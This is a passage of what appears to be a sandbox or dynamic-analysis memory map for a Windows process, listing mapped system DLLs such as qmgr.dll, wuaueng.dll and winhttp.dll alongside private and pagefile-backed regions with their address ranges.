id = 471
start_va = 0x74990000
end_va = 0x749b1fff
entry_point = 0x74990000
region_type = mapped_file
name = "logoncli.dll"
filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")
Region:
id = 472
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 473
start_va = 0x74af0000
end_va = 0x74af5fff
entry_point = 0x74af0000
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")
Region:
id = 474
start_va = 0x74b00000
end_va = 0x74b3bfff
entry_point = 0x74b00000
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 475
start_va = 0x74b40000
end_va = 0x74b55fff
entry_point = 0x74b40000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 476
start_va = 0x74c10000
end_va = 0x74c3afff
entry_point = 0x74c10000
region_type = mapped_file
name = "netjoin.dll"
filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")
Region:
id = 477
start_va = 0x74c60000
end_va = 0x74c66fff
entry_point = 0x74c60000
region_type = mapped_file
name = "sysntfy.dll"
filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll")
Region:
id = 478
start_va = 0x74cd0000
end_va = 0x74ceafff
entry_point = 0x74cd0000
region_type = mapped_file
name = "authz.dll"
filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll")
Region:
id = 479
start_va = 0x74d00000
end_va = 0x74d41fff
entry_point = 0x74d00000
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 480
start_va = 0x74d50000
end_va = 0x74d60fff
entry_point = 0x74d50000
region_type = mapped_file
name = "cryptdll.dll"
filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll")
Region:
id = 481
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 482
start_va = 0x74f80000
end_va = 0x74f87fff
entry_point = 0x74f80000
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 483
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 484
start_va = 0x74fc0000
end_va = 0x74fcbfff
entry_point = 0x74fc0000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 485
start_va = 0x74fd0000
end_va = 0x7502efff
entry_point = 0x74fd0000
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 486
start_va = 0x75030000
end_va = 0x75058fff
entry_point = 0x75030000
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 487
start_va = 0x75060000
end_va = 0x7506dfff
entry_point = 0x75060000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 488
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 489
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 490
start_va = 0x750f0000
end_va = 0x7511cfff
entry_point = 0x750f0000
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 491
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 492
start_va = 0x752d0000
end_va = 0x752f6fff
entry_point = 0x752d0000
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 493
start_va = 0x75300000
end_va = 0x75311fff
entry_point = 0x75300000
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 494
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 495
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 496
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 497
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 498
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 499
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 500
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 501
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 502
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 503
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 504
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 505
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 506
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 507
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 508
start_va = 0x76c00000
end_va = 0x76d9cfff
entry_point = 0x76c00000
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 509
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 510
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 511
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 512
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 513
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 514
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 515
start_va = 0x770c0000
end_va = 0x77142fff
entry_point = 0x770c0000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 516
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 517
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 518
start_va = 0x7ff8e000
end_va = 0x7ff8efff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff8e000"
filename = ""
Region:
id = 519
start_va = 0x7ff8f000
end_va = 0x7ff8ffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff8f000"
filename = ""
Region:
id = 520
start_va = 0x7ff90000
end_va = 0x7ff90fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff90000"
filename = ""
Region:
id = 521
start_va = 0x7ff91000
end_va = 0x7ff91fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff91000"
filename = ""
Region:
id = 522
start_va = 0x7ff92000
end_va = 0x7ff92fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff92000"
filename = ""
Region:
id = 523
start_va = 0x7ff93000
end_va = 0x7ff93fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff93000"
filename = ""
Region:
id = 524
start_va = 0x7ff94000
end_va = 0x7ff94fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff94000"
filename = ""
Region:
id = 525
start_va = 0x7ff95000
end_va = 0x7ff95fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff95000"
filename = ""
Region:
id = 526
start_va = 0x7ff96000
end_va = 0x7ff96fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff96000"
filename = ""
Region:
id = 527
start_va = 0x7ff98000
end_va = 0x7ff98fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff98000"
filename = ""
Region:
id = 528
start_va = 0x7ff9a000
end_va = 0x7ff9afff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff9a000"
filename = ""
Region:
id = 529
start_va = 0x7ff9c000
end_va = 0x7ff9cfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff9c000"
filename = ""
Region:
id = 530
start_va = 0x7ff9d000
end_va = 0x7ff9dfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff9d000"
filename = ""
Region:
id = 531
start_va = 0x7ff9e000
end_va = 0x7ff9efff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff9e000"
filename = ""
Region:
id = 532
start_va = 0x7ffa1000
end_va = 0x7ffa1fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffa1000"
filename = ""
Region:
id = 533
start_va = 0x7ffa2000
end_va = 0x7ffa2fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffa2000"
filename = ""
Region:
id = 534
start_va = 0x7ffa3000
end_va = 0x7ffa3fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffa3000"
filename = ""
Region:
id = 535
start_va = 0x7ffa5000
end_va = 0x7ffa5fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffa5000"
filename = ""
Region:
id = 536
start_va = 0x7ffa6000
end_va = 0x7ffa6fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffa6000"
filename = ""
Region:
id = 537
start_va = 0x7ffa7000
end_va = 0x7ffa7fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffa7000"
filename = ""
Region:
id = 538
start_va = 0x7ffa8000
end_va = 0x7ffa8fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffa8000"
filename = ""
Region:
id = 539
start_va = 0x7ffa9000
end_va = 0x7ffa9fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffa9000"
filename = ""
Region:
id = 540
start_va = 0x7ffaa000
end_va = 0x7ffaafff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffaa000"
filename = ""
Region:
id = 541
start_va = 0x7ffab000
end_va = 0x7ffabfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffab000"
filename = ""
Region:
id = 542
start_va = 0x7ffac000
end_va = 0x7ffacfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffac000"
filename = ""
Region:
id = 543
start_va = 0x7ffad000
end_va = 0x7ffadfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffad000"
filename = ""
Region:
id = 544
start_va = 0x7ffae000
end_va = 0x7ffaefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffae000"
filename = ""
Region:
id = 545
start_va = 0x7ffaf000
end_va = 0x7ffaffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffaf000"
filename = ""
Region:
id = 546
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 547
start_va = 0x7ffd3000
end_va = 0x7ffd3fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd3000"
filename = ""
Region:
id = 548
start_va = 0x7ffd4000
end_va = 0x7ffd4fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd4000"
filename = ""
Region:
id = 549
start_va = 0x7ffd5000
end_va = 0x7ffd5fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd5000"
filename = ""
Region:
id = 550
start_va = 0x7ffd6000
end_va = 0x7ffd6fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd6000"
filename = ""
Region:
id = 551
start_va = 0x7ffd7000
end_va = 0x7ffd7fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd7000"
filename = ""
Region:
id = 552
start_va = 0x7ffd8000
end_va = 0x7ffd8fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd8000"
filename = ""
Region:
id = 553
start_va = 0x7ffd9000
end_va = 0x7ffd9fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd9000"
filename = ""
Region:
id = 554
start_va = 0x7ffda000
end_va = 0x7ffdafff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffda000"
filename = ""
Region:
id = 555
start_va = 0x7ffdb000
end_va = 0x7ffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdb000"
filename = ""
Region:
id = 556
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 557
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 558
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 559
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 1090
start_va = 0x1920000
end_va = 0x195ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001920000"
filename = ""
Region:
id = 1091
start_va = 0x2160000
end_va = 0x219ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002160000"
filename = ""
Region:
id = 1092
start_va = 0x2670000
end_va = 0x26affff
entry_point = 0x0
region_type = private
name = "private_0x0000000002670000"
filename = ""
Region:
id = 1093
start_va = 0x2960000
end_va = 0x2b5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002960000"
filename = ""
Region:
id = 1094
start_va = 0x6d850000
end_va = 0x6d8e1fff
entry_point = 0x6d850000
region_type = mapped_file
name = "qmgr.dll"
filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll")
Region:
id = 1095
start_va = 0x71a40000
end_va = 0x71a47fff
entry_point = 0x71a40000
region_type = mapped_file
name = "bitsperf.dll"
filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll")
Region:
id = 1096
start_va = 0x7ff9f000
end_va = 0x7ff9ffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff9f000"
filename = ""
Region:
id = 1097
start_va = 0x7ffa0000
end_va = 0x7ffa0fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffa0000"
filename = ""
Region:
id = 1098
start_va = 0x7ffa4000
end_va = 0x7ffa4fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffa4000"
filename = ""
Region:
id = 1099
start_va = 0xb60000
end_va = 0xb60fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000b60000"
filename = ""
Region:
id = 1100
start_va = 0xb80000
end_va = 0xb80fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000b80000"
filename = ""
Region:
id = 1101
start_va = 0x28d0000
end_va = 0x290ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000028d0000"
filename = ""
Region:
id = 1102
start_va = 0x6f8c0000
end_va = 0x6f8ccfff
entry_point = 0x6f8c0000
region_type = mapped_file
name = "bitsigd.dll"
filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll")
Region:
id = 1103
start_va = 0x1ef0000
end_va = 0x1f2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001ef0000"
filename = ""
Region:
id = 1104
start_va = 0x6f690000
end_va = 0x6f6c5fff
entry_point = 0x6f690000
region_type = mapped_file
name = "upnp.dll"
filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll")
Region:
id = 1105
start_va = 0x6fa10000
end_va = 0x6fa1cfff
entry_point = 0x6fa10000
region_type = mapped_file
name = "ssdpapi.dll"
filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll")
Region:
id = 1106
start_va = 0x6fa30000
end_va = 0x6fa7efff
entry_point = 0x6fa30000
region_type = mapped_file
name = "webio.dll"
filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")
Region:
id = 1107
start_va = 0x6fa80000
end_va = 0x6fad7fff
entry_point = 0x6fa80000
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 1108
start_va = 0x7ff9b000
end_va = 0x7ff9bfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff9b000"
filename = ""
Region:
id = 1109
start_va = 0xee0000
end_va = 0xee0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000ee0000"
filename = ""
Region:
id = 1110
start_va = 0x11d0000
end_va = 0x120ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000011d0000"
filename = ""
Region:
id = 1111
start_va = 0x1a40000
end_va = 0x1a7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001a40000"
filename = ""
Region:
id = 1112
start_va = 0x1e20000
end_va = 0x1e5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001e20000"
filename = ""
Region:
id = 1113
start_va = 0x20d0000
end_va = 0x210ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000020d0000"
filename = ""
Region:
id = 1114
start_va = 0x24e0000
end_va = 0x251ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000024e0000"
filename = ""
Region:
id = 1115
start_va = 0x2700000
end_va = 0x273ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 1116
start_va = 0x27f0000
end_va = 0x282ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000027f0000"
filename = ""
Region:
id = 1117
start_va = 0x2830000
end_va = 0x286ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 1118
start_va = 0x2b60000
end_va = 0x2d5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b60000"
filename = ""
Region:
id = 1119
start_va = 0x2d60000
end_va = 0x2e5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002d60000"
filename = ""
Region:
id = 1120
start_va = 0x6f8b0000
end_va = 0x6f8b8fff
entry_point = 0x6f8b0000
region_type = mapped_file
name = "qmgrprxy.dll"
filename = "\\Windows\\System32\\qmgrprxy.dll" (normalized: "c:\\windows\\system32\\qmgrprxy.dll")
Region:
id = 1121
start_va = 0x7ff8a000
end_va = 0x7ff8afff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff8a000"
filename = ""
Region:
id = 1122
start_va = 0x7ff8b000
end_va = 0x7ff8bfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff8b000"
filename = ""
Region:
id = 1123
start_va = 0x7ff8c000
end_va = 0x7ff8cfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff8c000"
filename = ""
Region:
id = 1124
start_va = 0x7ff8d000
end_va = 0x7ff8dfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff8d000"
filename = ""
Region:
id = 1125
start_va = 0x7ff97000
end_va = 0x7ff97fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff97000"
filename = ""
Region:
id = 1126
start_va = 0x7ff99000
end_va = 0x7ff99fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff99000"
filename = ""
Region:
id = 1128
start_va = 0x2870000
end_va = 0x28affff
entry_point = 0x0
region_type = private
name = "private_0x0000000002870000"
filename = ""
Region:
id = 1129
start_va = 0x2e60000
end_va = 0x2f60fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002e60000"
filename = ""
Region:
id = 1130
start_va = 0x2f70000
end_va = 0x302ffff
entry_point = 0x2f70000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 1131
start_va = 0x3060000
end_va = 0x309ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003060000"
filename = ""
Region:
id = 1132
start_va = 0x30a0000
end_va = 0x30dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000030a0000"
filename = ""
Region:
id = 1133
start_va = 0x30f0000
end_va = 0x312ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000030f0000"
filename = ""
Region:
id = 1134
start_va = 0x6d840000
end_va = 0x6d84ffff
entry_point = 0x6d840000
region_type = mapped_file
name = "ncprov.dll"
filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll")
Region:
id = 1135
start_va = 0x7ff86000
end_va = 0x7ff86fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff86000"
filename = ""
Region:
id = 1136
start_va = 0x7ff87000
end_va = 0x7ff87fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff87000"
filename = ""
Region:
id = 1137
start_va = 0x7ff88000
end_va = 0x7ff88fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff88000"
filename = ""
Region:
id = 1138
start_va = 0x7ff89000
end_va = 0x7ff89fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff89000"
filename = ""
Region:
id = 1139
start_va = 0x26c0000
end_va = 0x26fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 1140
start_va = 0x2830000
end_va = 0x286ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 1141
start_va = 0x31e0000
end_va = 0x321ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000031e0000"
filename = ""
Region:
id = 1142
start_va = 0x3290000
end_va = 0x32cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003290000"
filename = ""
Region:
id = 1143
start_va = 0x719f0000
end_va = 0x71a01fff
entry_point = 0x719f0000
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")
Region:
id = 1144
start_va = 0x7ff83000
end_va = 0x7ff83fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff83000"
filename = ""
Region:
id = 1145
start_va = 0x7ff84000
end_va = 0x7ff84fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff84000"
filename = ""
Region:
id = 1146
start_va = 0x7ff85000
end_va = 0x7ff85fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff85000"
filename = ""
Region:
id = 1974
start_va = 0x1520000
end_va = 0x155ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001520000"
filename = ""
Region:
id = 1975
start_va = 0x1ce0000
end_va = 0x1d1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001ce0000"
filename = ""
Region:
id = 1976
start_va = 0x1e10000
end_va = 0x1e4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001e10000"
filename = ""
Region:
id = 1977
start_va = 0x1e50000
end_va = 0x1e8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001e50000"
filename = ""
Region:
id = 1978
start_va = 0x2150000
end_va = 0x218ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002150000"
filename = ""
Region:
id = 1979
start_va = 0x2e60000
end_va = 0x2e9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002e60000"
filename = ""
Region:
id = 1980
start_va = 0x2f10000
end_va = 0x2f4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f10000"
filename = ""
Region:
id = 1981
start_va = 0x3160000
end_va = 0x319ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003160000"
filename = ""
Region:
id = 1982
start_va = 0x32d0000
end_va = 0x33d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000032d0000"
filename = ""
Region:
id = 1983
start_va = 0x6c870000
end_va = 0x6ca45fff
entry_point = 0x6c870000
region_type = mapped_file
name = "wuaueng.dll"
filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll")
Region:
id = 1984
start_va = 0x6d4f0000
end_va = 0x6d4fbfff
entry_point = 0x6d4f0000
region_type = mapped_file
name = "mspatcha.dll"
filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll")
Region:
id = 1985
start_va = 0x6d500000
end_va = 0x6d514fff
entry_point = 0x6d500000
region_type = mapped_file
name = "cabinet.dll"
filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll")
Region:
id = 1986
start_va = 0x6f700000
end_va = 0x6f8a2fff
entry_point = 0x6f700000
region_type = mapped_file
name = "esent.dll"
filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll")
Region:
id = 1987
start_va = 0x6fd30000
end_va = 0x6fd80fff
entry_point = 0x6fd30000
region_type = mapped_file
name = "winspool.drv"
filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv")
Region:
id = 1988
start_va = 0x7ff82000
end_va = 0x7ff82fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff82000"
filename = ""
Region:
id = 1989
start_va = 0x7ff9c000
end_va = 0x7ff9cfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff9c000"
filename = ""
Region:
id = 1990
start_va = 0x33e0000
end_va = 0x349ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000033e0000"
filename = ""
Region:
id = 1991
start_va = 0x77060000
end_va = 0x77064fff
entry_point = 0x77060000
region_type = mapped_file
